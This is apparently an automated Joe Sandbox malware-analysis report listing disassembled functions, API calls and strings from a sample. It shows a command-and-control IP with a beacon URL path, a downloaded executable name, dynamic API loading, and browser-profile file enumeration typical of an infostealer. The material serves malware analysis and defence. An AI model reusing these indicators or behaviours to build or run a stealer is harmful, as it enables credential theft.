Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
String ID: =wB
API String ID: 372095707-727605340
Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
Instruction ID: 045c0b88f437fd76bdbb58d7eb7a4bb1f0408dc1024841df345b28c25508eb41
Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
Instruction Fuzzy Hash: EC2115B1A00B06AFE714DF69C285659FBF0FF08314F60926ED01997A80D774B964CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04324073 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04324078
std::locale::_Init.LIBCPMT ref: 0432409A

Part of subcall function 04327FDA: __EH_prolog3.LIBCMT ref: 04327FE1
Part of subcall function 04327FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04327FEC
Part of subcall function 04327FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04328007
Part of subcall function 04327FDA: _Yarn.LIBCPMT ref: 0432801D
Part of subcall function 04327FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0432805D

Part of subcall function 043243F0: __EH_prolog.LIBCMT ref: 043243F5
Part of subcall function 043243F0: std::_Lockit::_Lockit.LIBCPMT ref: 04324404
Part of subcall function 043243F0: int.LIBCPMT ref: 0432441B
Part of subcall function 043243F0: std::locale::_Getfacet.LIBCPMT ref: 04324424
Part of subcall function 043243F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0432446B

Part of subcall function 04323651: __EH_prolog.LIBCMT ref: 04323656
Part of subcall function 04323651: std::_Lockit::_Lockit.LIBCPMT ref: 04323665
Part of subcall function 04323651: int.LIBCPMT ref: 0432367C
Part of subcall function 04323651: std::locale::_Getfacet.LIBCPMT ref: 04323685
Part of subcall function 04323651: std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC

Strings

wB, xrefs: 04324073

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
String ID: wB
API String ID: 3898505750-480074513
Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
Instruction ID: 28684e76ce711191e5a773b5dad8bc14de23fbb1548428ec8bb0e08b01edbb97
Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
Instruction Fuzzy Hash: 0221D471901224DFE718DF68DA41BADB7B4FF58314F20415ED8159B281DB74BA05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 0432374A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0432374F

Strings

/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 04323757
one, xrefs: 04323758

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
API String ID: 3519838083-2876206925
Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
Instruction ID: e7ca98ceabaac091dbd3726a8ff27b6b7a62161aca4fa919c284864c970c2bea
Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
Instruction Fuzzy Hash: EF1104B2A00524BBEB059F98CD40BEEB7B9FF48724F104529F804E7240D375BA508BA0

Uniqueness

Uniqueness Score: -1.00%

Function 004034E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004034E8

Strings

/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 004034F0
one, xrefs: 004034F1

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog
String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
API String ID: 3519838083-2876206925
Opcode ID: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
Opcode Fuzzy Hash: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
Opcode Fuzzy Hash: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
Opcode Fuzzy Hash: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04321A6D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04321A72

Strings

ios_base::failbit set, xrefs: 04321A82
[vB, xrefs: 04321A6D

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: [vB$ios_base::failbit set
API String ID: 3519838083-2429468811
Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
Instruction ID: 35c8f57c40f201c35498085ad6a538050e2bcf46408958c2aec7df40f34c8ca0
Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
Instruction Fuzzy Hash: F60184725001199FDB04DF58C940BFEBBB8EF59328F14915EE401A7250D7B46E45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04346581 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,04345DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0434658B

Strings

/1/Qg_Appv5.exe, xrefs: 04346581
Qg_Appv5.exe, xrefs: 04346591

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
API String ID: 2920410445-1161945460
Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
Instruction ID: 3e366c84bdf96a866e9d5b535984a510e8080325c4dffffd42e75957f429669b
Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
Instruction Fuzzy Hash: 69E026023048010A5F290C2A3C1AAEBDF43DFC751034882AAD88207249CD412C0BD670

Uniqueness

Uniqueness Score: -1.00%

Function 0042631A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324

Strings

/1/Qg_Appv5.exe, xrefs: 0042631A
Qg_Appv5.exe, xrefs: 0042632A

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: PathTemp
String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
API String ID: 2920410445-1161945460
Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0

Uniqueness

Uniqueness Score: -1.00%

Function 0433AA64 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0433AAFA
GetLastError.KERNEL32 ref: 0433AB08
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0433AB63

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
Instruction ID: 05e29892ced5c863c47efc0459c26f945d06365941b6d883ff0add7b8a8df65e
Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
Instruction Fuzzy Hash: 2441EA31600645AFDF21AF64D848BBE7BAAEF01322F1551EDE999AB1E0DB30A901C750

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7FD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
GetLastError.KERNEL32 ref: 0041A8A1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u48o.0.exePID: 3912, Parent PID: 5496COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,040680A8), ref: 0041625D
GetProcAddress.KERNEL32(77190000,040680C8), ref: 00416275
GetProcAddress.KERNEL32(77190000,040836A8), ref: 0041628E
GetProcAddress.KERNEL32(77190000,040834C8), ref: 004162A6
GetProcAddress.KERNEL32(77190000,040833F0), ref: 004162BE
GetProcAddress.KERNEL32(77190000,04083408), ref: 004162D7
GetProcAddress.KERNEL32(77190000,04066328), ref: 004162EF
GetProcAddress.KERNEL32(77190000,040834E0), ref: 00416307
GetProcAddress.KERNEL32(77190000,040835D0), ref: 00416320
GetProcAddress.KERNEL32(77190000,04083438), ref: 00416338
GetProcAddress.KERNEL32(77190000,040834F8), ref: 00416350
GetProcAddress.KERNEL32(77190000,040680E8), ref: 00416369
GetProcAddress.KERNEL32(77190000,04067E68), ref: 00416381
GetProcAddress.KERNEL32(77190000,04067C08), ref: 00416399
GetProcAddress.KERNEL32(77190000,04067C88), ref: 004163B2
GetProcAddress.KERNEL32(77190000,040835E8), ref: 004163CA
GetProcAddress.KERNEL32(77190000,04083528), ref: 004163E2
GetProcAddress.KERNEL32(77190000,04066350), ref: 004163FB
GetProcAddress.KERNEL32(77190000,04067DC8), ref: 00416413
GetProcAddress.KERNEL32(77190000,04083678), ref: 0041642B
GetProcAddress.KERNEL32(77190000,04085D58), ref: 00416444
GetProcAddress.KERNEL32(77190000,04085E90), ref: 0041645C
GetProcAddress.KERNEL32(77190000,04085D40), ref: 00416474
GetProcAddress.KERNEL32(77190000,04067DE8), ref: 0041648D
GetProcAddress.KERNEL32(77190000,04085E48), ref: 004164A5
GetProcAddress.KERNEL32(77190000,04085EA8), ref: 004164BD
GetProcAddress.KERNEL32(77190000,04085CF8), ref: 004164D6
GetProcAddress.KERNEL32(77190000,04085E00), ref: 004164EE
GetProcAddress.KERNEL32(77190000,04085D10), ref: 00416506
GetProcAddress.KERNEL32(77190000,04085D70), ref: 0041651F
GetProcAddress.KERNEL32(77190000,04085E18), ref: 00416537
GetProcAddress.KERNEL32(77190000,04085F20), ref: 0041654F
GetProcAddress.KERNEL32(77190000,04085D88), ref: 00416568
GetProcAddress.KERNEL32(77190000,04061DC8), ref: 00416580
GetProcAddress.KERNEL32(77190000,04085E60), ref: 00416598
GetProcAddress.KERNEL32(77190000,04085D28), ref: 004165B1
GetProcAddress.KERNEL32(77190000,04067E88), ref: 004165C9
GetProcAddress.KERNEL32(77190000,04085E78), ref: 004165E1
GetProcAddress.KERNEL32(77190000,04067CA8), ref: 004165FA
GetProcAddress.KERNEL32(77190000,04085EC0), ref: 00416612
GetProcAddress.KERNEL32(77190000,04085DA0), ref: 0041662A
GetProcAddress.KERNEL32(77190000,04067BE8), ref: 00416643
GetProcAddress.KERNEL32(77190000,04067D08), ref: 0041665B
LoadLibraryA.KERNEL32(04085DB8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04085DD0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(04085F38,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(04085EF0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(04085DE8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(04085E30,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(04085ED8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04085F08,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(77040000,04067D28), ref: 0041670A
GetProcAddress.KERNEL32(77040000,04085F50), ref: 00416722
GetProcAddress.KERNEL32(77040000,04083818), ref: 0041673A
GetProcAddress.KERNEL32(77040000,04085F68), ref: 00416753
GetProcAddress.KERNEL32(77040000,04067C28), ref: 0041676B
GetProcAddress.KERNEL32(70530000,04066378), ref: 00416790
GetProcAddress.KERNEL32(70530000,04067BA8), ref: 004167A9
GetProcAddress.KERNEL32(70530000,040663A0), ref: 004167C1
GetProcAddress.KERNEL32(70530000,04085F80), ref: 004167D9
GetProcAddress.KERNEL32(70530000,04085F98), ref: 004167F2
GetProcAddress.KERNEL32(70530000,04067BC8), ref: 0041680A
GetProcAddress.KERNEL32(70530000,04067F28), ref: 00416822
GetProcAddress.KERNEL32(70530000,04085CE0), ref: 0041683B
GetProcAddress.KERNEL32(768D0000,04067C48), ref: 0041685C
GetProcAddress.KERNEL32(768D0000,04067F08), ref: 00416874
GetProcAddress.KERNEL32(768D0000,04085FB0), ref: 0041688D
GetProcAddress.KERNEL32(768D0000,04085CC8), ref: 004168A5
GetProcAddress.KERNEL32(768D0000,04067EE8), ref: 004168BD
GetProcAddress.KERNEL32(75790000,040663C8), ref: 004168E3
GetProcAddress.KERNEL32(75790000,04066620), ref: 004168FB
GetProcAddress.KERNEL32(75790000,04086070), ref: 00416913
GetProcAddress.KERNEL32(75790000,04067CC8), ref: 0041692C
GetProcAddress.KERNEL32(75790000,04067E28), ref: 00416944
GetProcAddress.KERNEL32(75790000,040665D0), ref: 0041695C
GetProcAddress.KERNEL32(75A10000,04086040), ref: 00416982
GetProcAddress.KERNEL32(75A10000,04067E08), ref: 0041699A
GetProcAddress.KERNEL32(75A10000,040838F8), ref: 004169B2
GetProcAddress.KERNEL32(75A10000,04086088), ref: 004169CB
GetProcAddress.KERNEL32(75A10000,04086028), ref: 004169E3
GetProcAddress.KERNEL32(75A10000,04067E48), ref: 004169FB
GetProcAddress.KERNEL32(75A10000,04067F48), ref: 00416A14
GetProcAddress.KERNEL32(75A10000,04085FE0), ref: 00416A2C
GetProcAddress.KERNEL32(75A10000,04086058), ref: 00416A44
GetProcAddress.KERNEL32(76850000,04067EA8), ref: 00416A66
GetProcAddress.KERNEL32(76850000,04085FC8), ref: 00416A7E
GetProcAddress.KERNEL32(76850000,04085FF8), ref: 00416A96
GetProcAddress.KERNEL32(76850000,04086010), ref: 00416AAF
GetProcAddress.KERNEL32(76850000,04086370), ref: 00416AC7
GetProcAddress.KERNEL32(75690000,04067B68), ref: 00416AE8
GetProcAddress.KERNEL32(75690000,04067B88), ref: 00416B01
GetProcAddress.KERNEL32(769C0000,04067EC8), ref: 00416B22
GetProcAddress.KERNEL32(769C0000,04086340), ref: 00416B3A
GetProcAddress.KERNEL32(6F8E0000,04067C68), ref: 00416B60
GetProcAddress.KERNEL32(6F8E0000,04067CE8), ref: 00416B78
GetProcAddress.KERNEL32(6F8E0000,04067D48), ref: 00416B90
GetProcAddress.KERNEL32(6F8E0000,04086268), ref: 00416BA9
GetProcAddress.KERNEL32(6F8E0000,04067D68), ref: 00416BC1
GetProcAddress.KERNEL32(6F8E0000,04067D88), ref: 00416BD9
GetProcAddress.KERNEL32(6F8E0000,04067DA8), ref: 00416BF2
GetProcAddress.KERNEL32(6F8E0000,04086DF8), ref: 00416C0A
GetProcAddress.KERNEL32(75D90000,04086130), ref: 00416C2B
GetProcAddress.KERNEL32(75D90000,04083958), ref: 00416C44
GetProcAddress.KERNEL32(75D90000,04086160), ref: 00416C5C
GetProcAddress.KERNEL32(75D90000,040863B8), ref: 00416C74
GetProcAddress.KERNEL32(76470000,04086F78), ref: 00416C96
GetProcAddress.KERNEL32(6D410000,040861A8), ref: 00416CB7
GetProcAddress.KERNEL32(6D410000,04086F58), ref: 00416CCF
GetProcAddress.KERNEL32(6D410000,04086178), ref: 00416CE8
GetProcAddress.KERNEL32(6D410000,04086358), ref: 00416D00

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s%s, xrefs: 00411838
%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Preferences, xrefs: 0040B8BE
Google Chrome, xrefs: 0040BDB9
Brave, xrefs: 0040B8A2
\Brave\Preferences, xrefs: 0040B97B

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

